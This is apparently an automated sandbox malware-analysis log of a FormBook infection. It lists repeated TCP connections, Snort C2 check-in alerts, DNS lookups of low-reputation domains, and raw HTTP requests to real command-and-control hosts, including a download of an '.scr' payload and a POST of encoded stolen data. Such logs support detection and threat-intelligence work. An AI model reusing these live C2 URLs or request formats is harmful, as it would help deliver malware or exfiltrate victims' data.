            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
            Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 192.168.2.22:49164 -> 66.96.161.166:80
            Source: global trafficTCP traffic: 66.96.161.166:80 -> 192.168.2.22:49164
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49165
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 45.33.6.223:80

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49164 -> 66.96.161.166:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49169 -> 94.23.162.163:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49173 -> 194.9.94.86:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49177 -> 91.195.240.19:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49181 -> 198.12.241.35:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49185 -> 183.111.183.31:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49189 -> 67.223.117.189:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49193 -> 154.41.250.58:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49197 -> 183.111.183.31:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.22:49201 -> 208.91.197.13:80
            Performs DNS queries to domains with low reputation
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeDNS query: www.99b6q.xyz
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeDNS query: www.99b6q.xyz
            Source: Joe Sandbox ViewIP Address: 194.9.94.86 194.9.94.86
            Source: Joe Sandbox ViewIP Address: 45.33.6.223 45.33.6.223
            Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7BC00D90-3286-43A4-8263-7BB80B0A8239}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /opp.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: universalmovies.topConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.terelprime.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /2019/sqlite-dll-win32-x86-3290000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.kinkynerdspro.blogUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.xn--matfrmn-jxa4m.seUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=uB/KNrYRIAEuVxS2CaQ/STQ79sXR+BlQlR67HQQqBOVPNI2QjXmfUVSCEalfoT0oEVOLH05GPMXaAce1CehAlwJBdX/jzmgGgvdHGe2cEEX0VUceLY//9BYN6rMd&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.primeplay88.orgUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=rAUFcaE3iKkr5p3m3tCLoIcgJcoBLqHpCHmto+mEvmfk+N6Cgt65oFJJSbTgZ9R+lJhnJt4KhMELuPRI2YfMmSiqMqXmclfFfZpNLn5Guu+tn093ffeUIUJTcA0L&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.aceautocorp.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=dHCsNlEiGcw6UpYNsSDwUGw5CVcYr5PGduxYMR+z/FEUJE9molBo2WPCHkLm6APtf7MOscmEgy++mrhWyRAZYaHU6QWLXqtmVhlHsy7bZNd62MlyuoEIWFEUa6hs&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.mrart.co.krUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.touchclean.topUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=hcZX01VSmexgOFZwe0PcJnDn64JizU3MIAbqwzBBfnOXJDQ4bl307S3dnZeIWVgo7b/xQLPX/O/pu59XEvJBdpQtuyZPu55k1rSFoeWQFZxG8CIiSfRAJf8aFXer&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.ibistradingco.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jnkinteractive.co.krUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ufuh/?pl=BGoM8L/qyzApLAJaWwxXSF4Q93O5MlPc94ZXocaCy2sUMxOmUp3yiivF6ezDdXcwaqjwM/LWkQHX7JcCzmOdeG0afWN38JyHw8R/BztNg4nUSBFA8ZqxTffzx161&5h1t=6H6PKFvXjtI4u8k HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Connection: closeHost: www.riveramayahousing.comUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
            Source: EQNEDT32.EXE, 00000002.00000002.349581619.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: universalmovies.top
            Source: global trafficDNS traffic detected: DNS query: www.besthomeincome24.com
            Source: global trafficDNS traffic detected: DNS query: www.terelprime.com
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.99b6q.xyz
            Source: global trafficDNS traffic detected: DNS query: www.kinkynerdspro.blog
            Source: global trafficDNS traffic detected: DNS query: www.xn--matfrmn-jxa4m.se
            Source: global trafficDNS traffic detected: DNS query: www.primeplay88.org
            Source: global trafficDNS traffic detected: DNS query: www.aceautocorp.com
            Source: global trafficDNS traffic detected: DNS query: www.mrart.co.kr
            Source: global trafficDNS traffic detected: DNS query: www.touchclean.top
            Source: global trafficDNS traffic detected: DNS query: www.ibistradingco.com
            Source: global trafficDNS traffic detected: DNS query: www.jnkinteractive.co.kr
            Source: global trafficDNS traffic detected: DNS query: www.chrisdomond.com
            Source: global trafficDNS traffic detected: DNS query: www.riveramayahousing.com
            Source: global trafficDNS traffic detected: DNS query: www.exclaimer342200213.net
            Source: unknownHTTP traffic detected: POST /ufuh/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Length: 2159Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.kinkynerdspro.blogOrigin: http://www.kinkynerdspro.blogReferer: http://www.kinkynerdspro.blog/ufuh/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36Data Raw: 70 6c 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 32 71 62 32 65 4c 53 47 74 5a 47 78 57 6e 4b 49 33 78 68 48 77 41 32 4b 4e 45 67 65 67 34 59 49 54 43 56 57 45 79 7a 75 4c 39 47 75 77 37 69 54 6e 77 56 72 2f 78 59 6b 6c 6d 54 6f 62 67 6e 4b 59 70 51 57 61 57 67 39 76 57 63 4f 51 68 57 38 5a 67 55 73 4f 52 72 58 69 39 39 38 2b 56 70 63 78 63 6e 4d 4f 71 52 62 32 31 41 31 41 69 7a 5a 69 4f 53 43 35 30 52 44 54 57 41 67 6d 44 6b 46 49 39 76 58 4c 39 50 56 2f 41 79 4d 64 57 63 30 75 42 64 2f 4a 50 70 32 47 56 75 6b 62 